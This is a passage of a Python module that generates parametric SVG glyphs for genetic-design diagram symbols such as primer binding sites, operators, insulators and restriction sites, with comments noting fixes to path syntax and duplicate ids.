    cds_path['parametric:d'] = 'M{(x+pad_left)},{(y+pad_top)+glyph_pad_top} L{(x+width-pad_right)-glyph_arrowhead_length},{(y+pad_top)+glyph_pad_top} L{(x+width-pad_right)},{(y+pad_top)+((height-pad_top-pad_bottom)/2)} L{(x+width-pad_right)-glyph_arrowhead_length},{(y+height-pad_bottom)-glyph_pad_bottom} L{(x+pad_left)},{(y+height-pad_bottom)-glyph_pad_bottom} Z'
    cds_path['d'] = eval_parameterised_path(cds_path['parametric:d'], params)
    cds_path['style'] = style_text['filled-path']
    glyph_paths.append(cds_path)
    return header_text, glyph_paths
def primer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Build the primer-binding-site glyph (half-arrow stroke above the baseline).

    baseline_x/baseline_y default to the module-level baseline origin
    (captured at definition time) and seed the parametric coordinate system.
    Returns (header_text, glyph_paths): the SVG header/bounding-box/baseline
    markup and a list of path-attribute dicts for write_glyph_svg().
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 3
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Primer specific parameters
    params['arrowbody_width'] = 10
    params['arrowhead_width'] = 3
    params['arrowhead_height'] = 3
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('PrimerBindingSite', 'SO:0005850', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-arrowhead_height-pad_top}', '{pad_before+arrowbody_width+pad_after}', '{pad_top+arrowhead_height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+arrowbody_width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    primer_path = {}
    primer_path['class'] = 'unfilled-path'
    primer_path['id'] = 'primer-binding-site'
    # Horizontal body stroke with one angled arrowhead stroke at the right end.
    primer_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+arrowbody_width},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+arrowbody_width-arrowhead_width},{(baseline_y-baseline_offset)-arrowhead_height}'
    primer_path['d'] = eval_parameterised_path(primer_path['parametric:d'], params)
    primer_path['style'] = style_text['unfilled-path']
    glyph_paths.append(primer_path)
    return header_text, glyph_paths
def origin_of_replication_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an OriginOfReplication
    glyph (SO:0000296).

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    # Parametric defaults shared by the header elements and the glyph path.
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        # Glyph specific parameter
        'width': 20,
    }
    # Header: SVG element, bounding box and baseline.
    header_text = svg_header('OriginOfReplication', 'SO:0000296', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width/2.0)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Single closed path: two mirrored cubic Beziers forming the circular glyph.
    ori_path = {'class': 'filled-path', 'id': 'origin-of-replication'}
    ori_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)} C{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'
    ori_path['d'] = eval_parameterised_path(ori_path['parametric:d'], params)
    ori_path['style'] = style_text['filled-path']
    return header_text, [ori_path]
def unspecified_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an Unspecified
    component glyph (SO:0000110): a filled diamond with a question mark.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    # Parametric defaults shared by the header elements and the glyph paths.
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        # Unspecified component parameter (diamond is width wide and width tall)
        'width': 15,
    }
    # Header: SVG element, bounding box and baseline.
    header_text = svg_header('Unspecified', 'SO:0000110', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width/2.0)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Three paths: diamond outline, question-mark curve, and its dot (a
    # zero-length segment rendered as a point).  style_text is keyed by the
    # same names used for the 'class' attribute.
    glyph_paths = []
    for path_class, path_id, d_spec in (
            ('filled-path', 'unspecified-boundry', 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width/2.0)},{(baseline_y-baseline_offset)-(width/2.0)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width/2.0)},{(baseline_y-baseline_offset)+(width/2.0)} Z'),
            ('unfilled-path', 'unspecified-question-mark', 'M{baseline_x+pad_before+(width*0.35)},{(baseline_y-baseline_offset)-(width*0.06)} C{baseline_x+pad_before+(width*0.35)},{(baseline_y-baseline_offset)-(width*0.23)} {baseline_x+pad_before+width-(width*0.25)},{(baseline_y-baseline_offset)-(width*0.23)} {baseline_x+pad_before+width-(width*0.35)},{(baseline_y-baseline_offset)+(width*0.01)} C{baseline_x+pad_before+width-(width*0.35)},{(baseline_y-baseline_offset)+(width*0.05)} {baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.01)} {baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.15)}'),
            ('unfilled-path', 'unspecified-question-mark-point', 'M{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.27)} L{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.27)}')):
        entry = {'class': path_class, 'id': path_id, 'parametric:d': d_spec}
        entry['d'] = eval_parameterised_path(d_spec, params)
        entry['style'] = style_text[path_class]
        glyph_paths.append(entry)
    return header_text, glyph_paths
def omitted_detail_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an Omitted Detail
    glyph (three dots along the baseline over a background strip).

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Omitted detail specific parameters
    params['width'] = 15
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Omitted Detail', '', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background strip behind the dots.
    # Fixed: removed the stray '}' after 'Z' (unbalanced brace in the
    # parametric path) and used pad_bottom for BOTH bottom corners (the
    # bottom-right corner previously used pad_top, making the strip
    # asymmetric whenever pad_top != pad_bottom).
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'omitted-detail-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(pad_top*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(pad_top*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(pad_bottom*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(pad_bottom*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Centre dot (zero-length segment rendered as a point).
    point1_path = {}
    point1_path['class'] = 'unfilled-path'
    point1_path['id'] = 'omitted-detail-point1'
    point1_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)}'
    point1_path['d'] = eval_parameterised_path(point1_path['parametric:d'], params)
    point1_path['style'] = style_text['unfilled-path']
    glyph_paths.append(point1_path)
    # Left dot.  Fixed: unique id (all three dots previously shared
    # 'omitted-detail-point1'; SVG id attributes must be unique).
    point2_path = {}
    point2_path['class'] = 'unfilled-path'
    point2_path['id'] = 'omitted-detail-point2'
    point2_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.25)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.25)},{(baseline_y-baseline_offset)}'
    point2_path['d'] = eval_parameterised_path(point2_path['parametric:d'], params)
    point2_path['style'] = style_text['unfilled-path']
    glyph_paths.append(point2_path)
    # Right dot.  Fixed: unique id (see above).
    point3_path = {}
    point3_path['class'] = 'unfilled-path'
    point3_path['id'] = 'omitted-detail-point3'
    point3_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.75)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.75)},{(baseline_y-baseline_offset)}'
    point3_path['d'] = eval_parameterised_path(point3_path['parametric:d'], params)
    point3_path['style'] = style_text['unfilled-path']
    glyph_paths.append(point3_path)
    return header_text, glyph_paths
def recombination_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for a Recombination Site
    glyph (a filled triangle centred on the baseline).

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    # Parametric defaults shared by the header elements and the glyph path.
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        # Glyph specific parameters
        'width': 10,
        'height': 15,
    }
    # Header: SVG element, bounding box and baseline.
    header_text = svg_header('Recombination Site', '', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Single filled triangle pointing along the strand direction.
    site_path = {'class': 'filled-path', 'id': 'recombination-site'}
    site_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    site_path['d'] = eval_parameterised_path(site_path['parametric:d'], params)
    site_path['style'] = style_text['filled-path']
    return header_text, [site_path]
def no_glyph_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for a No Glyph marker
    (two square brackets over a background rectangle).

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # No-glyph specific parameters
    params['width'] = 8
    params['height'] = 15
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('No Glyph', '', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background rectangle behind the brackets.
    # Fixed: id was the copy-pasted 'operator-background'; removed the stray
    # '-pad_top' from the top-right corner (the bracket paths below outline a
    # plain rectangle at +/- height*0.5) and the stray '}' after 'Z'.
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'no-glyph-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Left square bracket.
    no_glyph_path1 = {}
    no_glyph_path1['class'] = 'unfilled-path'
    no_glyph_path1['id'] = 'no-glyph-path1'
    no_glyph_path1['parametric:d'] = 'M{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)+(height*0.5)}'
    no_glyph_path1['d'] = eval_parameterised_path(no_glyph_path1['parametric:d'], params)
    no_glyph_path1['style'] = style_text['unfilled-path']
    glyph_paths.append(no_glyph_path1)
    # Right square bracket.
    # Fixed: unique id (was a duplicate of 'no-glyph-path1').
    no_glyph_path2 = {}
    no_glyph_path2['class'] = 'unfilled-path'
    no_glyph_path2['id'] = 'no-glyph-path2'
    no_glyph_path2['parametric:d'] = 'M{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)+(height*0.5)}'
    no_glyph_path2['d'] = eval_parameterised_path(no_glyph_path2['parametric:d'], params)
    no_glyph_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(no_glyph_path2)
    return header_text, glyph_paths
def operator_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an Operator glyph
    (SO:0000057, SO:0000409): an open-topped box on the baseline.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Operator specific parameters
    params['width'] = 7
    params['height'] = 7
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Operator', 'SO:0000057,SO:0000409', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background rectangle behind the operator outline.
    # Fixed: removed the stray '-pad_top' from the top-right corner so the
    # background matches the rectangle drawn by 'operator-path' below, and
    # removed the stray '}' after 'Z'.
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'operator-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Open rectangle outline (left, bottom and right edges; top left open).
    operator_path = {}
    operator_path['class'] = 'unfilled-path'
    operator_path['id'] = 'operator-path'
    operator_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
    operator_path['d'] = eval_parameterised_path(operator_path['parametric:d'], params)
    operator_path['style'] = style_text['unfilled-path']
    glyph_paths.append(operator_path)
    return header_text, glyph_paths
def assembly_scar_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an Assembly Scar
    glyph (SO:0001953): two parallel horizontal lines about the baseline.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Assembly scar specific parameters
    params['width'] = 15
    params['height'] = 5
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Assembly Scar', 'SO:0001953', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background rectangle between the two scar lines.
    # Fixed: removed the stray '-pad_top' from the top-right corner so the
    # background spans exactly between the lines at +/- height*0.5, and
    # removed the stray '}' after 'Z'.
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'assembly-scar-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Upper scar line.
    assembly_scar_path1 = {}
    assembly_scar_path1['class'] = 'unfilled-path'
    assembly_scar_path1['id'] = 'assembly-scar-path1'
    assembly_scar_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
    assembly_scar_path1['d'] = eval_parameterised_path(assembly_scar_path1['parametric:d'], params)
    assembly_scar_path1['style'] = style_text['unfilled-path']
    glyph_paths.append(assembly_scar_path1)
    # Lower scar line.
    # Fixed: unique id (was a duplicate of 'assembly-scar-path1').
    assembly_scar_path2 = {}
    assembly_scar_path2['class'] = 'unfilled-path'
    assembly_scar_path2['id'] = 'assembly-scar-path2'
    assembly_scar_path2['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)}'
    assembly_scar_path2['d'] = eval_parameterised_path(assembly_scar_path2['parametric:d'], params)
    assembly_scar_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(assembly_scar_path2)
    return header_text, glyph_paths
def blunt_restriction_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for a Blunt Restriction
    Site glyph (SO:0001691): two facing square brackets.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Blunt restriction site specific parameters
    params['width'] = 8
    params['height'] = 15
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Blunt Restriction Site', 'SO:0001691', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background rectangle between the bracket tips (width*0.3 to width*0.7).
    # Fixed: removed the stray '-pad_top' from the top-right corner so the
    # background is a plain rectangle at +/- height*0.5, and removed the
    # stray '}' after 'Z'.
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'blunt-restriction-site-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Left-facing bracket.
    blunt_restriction_site_path1 = {}
    blunt_restriction_site_path1['class'] = 'unfilled-path'
    blunt_restriction_site_path1['id'] = 'blunt-restriction-site-path1'
    blunt_restriction_site_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)}'
    blunt_restriction_site_path1['d'] = eval_parameterised_path(blunt_restriction_site_path1['parametric:d'], params)
    blunt_restriction_site_path1['style'] = style_text['unfilled-path']
    glyph_paths.append(blunt_restriction_site_path1)
    # Right-facing bracket.
    # Fixed: unique id (was a duplicate of 'blunt-restriction-site-path1').
    blunt_restriction_site_path2 = {}
    blunt_restriction_site_path2['class'] = 'unfilled-path'
    blunt_restriction_site_path2['id'] = 'blunt-restriction-site-path2'
    blunt_restriction_site_path2['parametric:d'] = 'M{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)}'
    blunt_restriction_site_path2['d'] = eval_parameterised_path(blunt_restriction_site_path2['parametric:d'], params)
    blunt_restriction_site_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(blunt_restriction_site_path2)
    return header_text, glyph_paths
def engineered_region_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an Engineered Region
    glyph (SO:0000804): a filled rectangle centred on the baseline.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    # Parametric defaults shared by the header elements and the glyph path.
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        # Glyph specific parameters
        'width': 30,
        'height': 15,
    }
    # Header: SVG element, bounding box and baseline.
    header_text = svg_header('Engineered Region', 'SO:0000804', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Single closed rectangle (the final point uses SVG's implicit lineto).
    er_path = {'class': 'filled-path', 'id': 'engineered-region-path'}
    er_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    er_path['d'] = eval_parameterised_path(er_path['parametric:d'], params)
    er_path['style'] = style_text['filled-path']
    return header_text, [er_path]
def insulator_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an Insulator glyph
    (SO:0000627): a filled inner square inside an outlined outer square.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Insulator specific parameter (square is width wide and width tall)
    params['width'] = 15
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Insulator', 'SO:0000627', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background square (same geometry as the outer outline below).
    # Fixed: removed the stray '}' after 'Z' that made the path data malformed.
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'insulator-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(width*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Outer square outline.
    insulator_outer_path = {}
    insulator_outer_path['class'] = 'unfilled-path'
    insulator_outer_path['id'] = 'insulator-outer-path'
    insulator_outer_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(width*0.5)} Z'
    insulator_outer_path['d'] = eval_parameterised_path(insulator_outer_path['parametric:d'], params)
    insulator_outer_path['style'] = style_text['unfilled-path']
    glyph_paths.append(insulator_outer_path)
    # Filled inner square, inset by width*0.2 on each side.
    insulator_inner_path = {}
    insulator_inner_path['class'] = 'filled-path'
    insulator_inner_path['id'] = 'insulator-inner-path'
    insulator_inner_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.2)},{(baseline_y-baseline_offset)-(width*0.3)} L{baseline_x+pad_before+width-(width*0.2)},{(baseline_y-baseline_offset)-(width*0.3)} L{baseline_x+pad_before+width-(width*0.2)},{(baseline_y-baseline_offset)+(width*0.3)} L{baseline_x+pad_before+(width*0.2)},{(baseline_y-baseline_offset)+(width*0.3)} Z'
    insulator_inner_path['d'] = eval_parameterised_path(insulator_inner_path['parametric:d'], params)
    insulator_inner_path['style'] = style_text['filled-path']
    glyph_paths.append(insulator_inner_path)
    return header_text, glyph_paths
def origin_of_transfer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for an OriginOfTransfer
    glyph (SO:0000724): the circular origin shape with an arrow.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    # Parametric defaults shared by the header elements and the glyph paths.
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
